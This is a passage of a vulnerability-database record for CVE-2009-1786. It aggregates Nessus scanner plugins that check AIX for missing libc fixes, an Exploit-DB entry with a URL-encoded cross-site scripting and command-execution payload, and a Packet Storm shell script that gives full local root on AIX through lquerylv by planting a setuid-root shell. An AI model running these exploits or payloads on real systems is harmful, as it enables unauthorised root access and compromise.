A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50129.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64326", "title": "AIX 6.1 TL 1 : libc (IZ50129)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64326);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 1 : libc (IZ50129)\");\n script_summary(english:\"Check for APAR IZ50129\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50500.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64330", "title": "AIX 5.3 TL 0 : libc (IZ50500)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64330);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 0 : libc (IZ50500)\");\n script_summary(english:\"Check for APAR IZ50500\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.rte.libc\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.adt.prof\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T18:15:49", "bulletinFamily": "exploit", "description": "Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability. CVE-2009-1786. Webapps exploit for php platform. [Note: the CVE-2009-1786 tag on this entry looks like a mis-association: the advisory text concerns a Kingsoft WebShield web issue (BID 35038), whereas this record describes CVE-2009-1786 as an AIX libc MALLOCDEBUG symlink issue; confirm the mapping before using this entry for AIX triage.]", "modified": "2009-05-20T00:00:00", "published": "2009-05-20T00:00:00", "id": "EDB-ID:33001", "href": "https://www.exploit-db.com/exploits/33001/", "type": "exploitdb", "title": "Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/35038/info\r\n\r\nThe Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability.\r\n\r\nRemote attackers may exploit this vulnerability to compromise an affected computer.\r\n\r\nThis issue affects WebShield 1.1.0.62 and prior versions. 
\r\n\r\nhttp://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e\r\n\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33001/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-04T00:00:00", "published": "2016-11-04T00:00:00", "href": "https://packetstormsecurity.com/files/139565/AIX-5.3-6.1-7.1-7.2-lquerylv-Local-Root.html", "id": "PACKETSTORM:139565", "title": "AIX 5.3 / 6.1 / 7.1 / 7.2 lquerylv Local Root", "type": "packetstorm", "sourceData": "`#!/usr/bin/sh \n# \n# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) \n# \n# This exploit takes advantage of known issues with debugging functions \n# within the AIX linker library. We are taking advantage of known \n# functionality, and focusing on badly coded SUID binaries which do not \n# adhere to proper security checks prior to seteuid/open/writes. \n# \n# The CVEs we will be taking advantage of: \n# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows \n# local users to create or overwrite arbitrary files via a symlink attack on \n# the log file associated with the MALLOCDEBUG environment variable. 
\n# \n# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does \n# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE \n# environment variables, which allows local users to gain privileges by \n# leveraging a setuid-root program to create an arbitrary root-owned file \n# with world-writable permissions, related to libC.a (aka the XL C++ runtime \n# library) in AIX 5.3 and libc.a in AIX 6.1. \n# \n# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary \n# File Writes In IBM AIX. \n# \n# In each instance of the aforementioned CVEs, IBM merely patched the binaries \n# which were reported in the original reports as being used for escalation of \n# the vulnerabilities. This allowed for the lquerylv binary to slip by their \n# patches and become an attack vector. \n# \n# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ \n# \n# lqueryroot.sh by @hxmonsegur [2016 //RSL] \n \nROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') \nAPP=$0 \n \nfunction usage \n{ \necho \"Usage: $APP [1] | [2] | [3]\" \necho \necho \"1 - MALLOCDEBUG file write -> escalation\" \necho \"2 - _LIB_INIT_DBG_FILE file write -> escalation\" \necho \"3 - MALLOCBUCKETS file write -> escalation\" \necho \necho \"[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL\" \nexit \n} \n \nfunction CVE20091786 \n{ \necho \"[*] Exporting MALLOCDEBUG environment variable\" \nMALLOCTYPE=debug \nMALLOCDEBUG=report_allocations,output:/etc/suid_profile \nexport MALLOCTYPE MALLOCDEBUG \n} \n \nfunction CVE20092669 \n{ \necho \"[*] Exporting _LIB_INIT_DBG_FILE environment variable\" \n_LIB_INIT_DBG=1 \n_LIB_INIT_DBG_FILE=/etc/suid_profile \nexport _LIB_INIT_DBG _LIB_INIT_DBG_FILE \n} \n \nfunction CVE20143074 \n{ \necho \"[*] Exporting MALLOCBUCKETS environment variable\" \nMALLOCOPTIONS=buckets 
\nMALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile \nexport MALLOCOPTIONS MALLOCBUCKETS \n} \n \nif [ -z \"$1\" ]; then \nusage \nexit 1 \nfi \n \nwhile [ \"$1\" != \"\" ]; do \ncase $1 in \n1 ) CVE20091786;; \n2 ) CVE20092669;; \n3 ) CVE20143074;; \n* ) usage \nbreak;; \nesac \nshift \ndone \n \nif [ ! -x \"/usr/sbin/lquerylv\" ]; then \necho \"[-] lquerylv isn't executable. Tough luck.\" \nexit 1 \nfi \n \necho \"[*] Setting umask to 000\" \numask 000 \n \necho \"[*] Execute our vulnerable binary\" \n/usr/sbin/lquerylv >/dev/null 2>&1 \n \nif [ ! -e \"/etc/suid_profile\" ]; then \necho \"[-] /etc/suid_profile does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Cleaning up /etc/suid_profile\" \necho > /etc/suid_profile \n \necho \"[*] Current id: `/usr/bin/id`\" \n \necho \"[*] Adding payload\" \ncat << EOF >/etc/suid_profile \ncp /bin/ksh $ROOTSHELL \n/usr/bin/syscall setreuid 0 0 \nchown root:system $ROOTSHELL \nchmod 6755 $ROOTSHELL \nrm /etc/suid_profile \nEOF \n \necho \"[*] Unsetting env\" \nunset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE \n \necho \"[*] Executing ibstat for fun and profit\" \n/usr/bin/ibstat -a >/dev/null 2>&1 \n \nif [ ! -e \"$ROOTSHELL\" ]; then \necho \"[-] Rootshell does not exist and exploit failed.\" \nexit 1 \nfi \n \necho \"[*] Executing rootshell\" \n$ROOTSHELL \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139565/aixlquery-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}